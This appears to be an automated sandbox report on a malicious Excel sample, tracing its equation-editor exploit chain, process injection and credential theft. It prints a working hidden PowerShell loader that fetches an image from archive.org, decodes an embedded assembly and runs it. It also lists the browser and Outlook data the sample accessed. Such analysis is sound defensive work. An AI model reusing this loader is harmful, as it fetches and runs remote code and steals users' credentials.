?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\dagifhd C:\Users\user\AppData\Roaming\dagifhdJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vfew/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?eJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vfew/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
            Source: explorer.exe, 0000000F.00000002.625029054.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.464649306.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000000F.00000002.625029054.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.464649306.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000F.00000002.625029054.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.464649306.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_001155EB cpuid 19_2_001155EB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdQueries volume information: C:\Users\user\AppData\Roaming\dagifhd VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C2112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,19_2_000C2112
            Source: C:\Windows\explorer.exeCode function: 15_2_02803490 GetUserNameW,15_2_02803490
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,19_2_000C2198
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3164, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3216, type: MEMORYSTR
            Source: Yara matchFile source: 13.2.powershell.exe.2565ab4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3164, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3216, type: MEMORYSTR
            Source: Yara matchFile source: 13.2.powershell.exe.2565ab4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting
            Valid Accounts11
            Native API
            121
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts53
            Exploitation for Client Execution
            1
            DLL Side-Loading
            623
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol11
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts111
            Command and Scripting Interpreter
            Logon Script (Windows)Logon Script (Windows)21
            Obfuscated Files or Information
            1
            Credentials in Registry
            13
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell
            Login HookLogin Hook1
            DLL Side-Loading
            NTDS127
            System Information Discovery
            Distributed Component Object Model11
            Input Capture
            115
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            File Deletion
            LSA Secrets431
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials141
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
            Virtualization/Sandbox Evasion
            DCSync13
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job623
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Hidden Files and Directories
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            Remote System Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502223 Sample: 40830001.xls Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 73 crash.sh 2->73 103 Multi AV Scanner detection for domain / URL 2->103 105 Suricata IDS alerts for network traffic 2->105 107 Found malware configuration 2->107 109 20 other signatures 2->109 12 EXCEL.EXE 57 31 2->12         started        16 taskeng.exe 1 2->16         started        signatures3 process4 dnsIp5 79 23.94.148.16, 49162, 49169, 49170 AS-COLOCROSSINGUS United States 12->79 81 crash.sh 208.64.171.230, 443, 49161, 49163 AS-CMNUS United States 12->81 65 C:\Users\user\Desktop\40830001.xls (copy), Composite 12->65 dropped 67 inetmecangetbackwi...girlgreatday[1].doc, Rich 12->67 dropped 18 wscript.exe 1 12->18         started        21 WINWORD.EXE 348 31 12->21         started        25 dagifhd 16->25         started        file6 process7 dnsIp8 85 Suspicious powershell command line found 18->85 87 Wscript starts Powershell (via cmd or directly) 18->87 89 Very long command line found 18->89 97 3 other signatures 18->97 27 powershell.exe 4 18->27         started        75 crash.sh 21->75 55 C:\Users\user\AppData\Roaming\...\udMVqm.url, MS 21->55 dropped 57 C:\Users\user\AppData\...\crash.sh.url, MS 21->57 dropped 59 ~WRF{21E9ADCA-4DF6...E-092206FC804F}.tmp, Composite 21->59 dropped 61 C:\Users\user\AppData\Local\...ADD419E.doc, Rich 21->61 dropped 91 Microsoft Office launches external ms-search protocol handler (WebDAV) 21->91 93 Office viewer loads remote template 21->93 95 Microsoft Office drops suspicious files 21->95 30 EQNEDT32.EXE 12 21->30         started        file9 signatures10 process11 file12 127 Suspicious powershell command line found 27->127 129 Suspicious execution chain found 27->129 33 powershell.exe 12 5 27->33         started        69 C:\...\verynicebuttersmoothcakeicream.vBs, Unicode 30->69 dropped 131 Office equation editor establishes network connection 30->131 133 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 30->133 signatures13 process14 dnsIp15 71 ia803104.us.archive.org 207.241.232.154, 443, 49171 INTERNET-ARCHIVEUS United States 33->71 99 Writes to foreign memory regions 33->99 101 Injects a PE file into a foreign processes 33->101 37 RegAsm.exe 33->37         started        signatures16 process17 signatures18 111 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 37->111 113 Maps a DLL or memory area into another process 37->113 115 Checks if the current machine is a virtual machine (disk enumeration) 37->115 117 2 other signatures 37->117 40 explorer.exe 3 2 37->40 injected process19 dnsIp20 77 prolinice.ga 185.251.91.119, 49173, 49174, 80 SPRINTHOSTRU Russian Federation 40->77 63 C:\Users\user\AppData\Roaming\dagifhd, PE32 40->63 dropped 119 Benign windows process drops PE files 40->119 121 Injects code into the Windows Explorer (explorer.exe) 40->121 123 Writes to foreign memory regions 40->123 125 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->125 45 explorer.exe 6 40->45         started        49 explorer.exe 40->49         started        51 explorer.exe 40->51         started        53 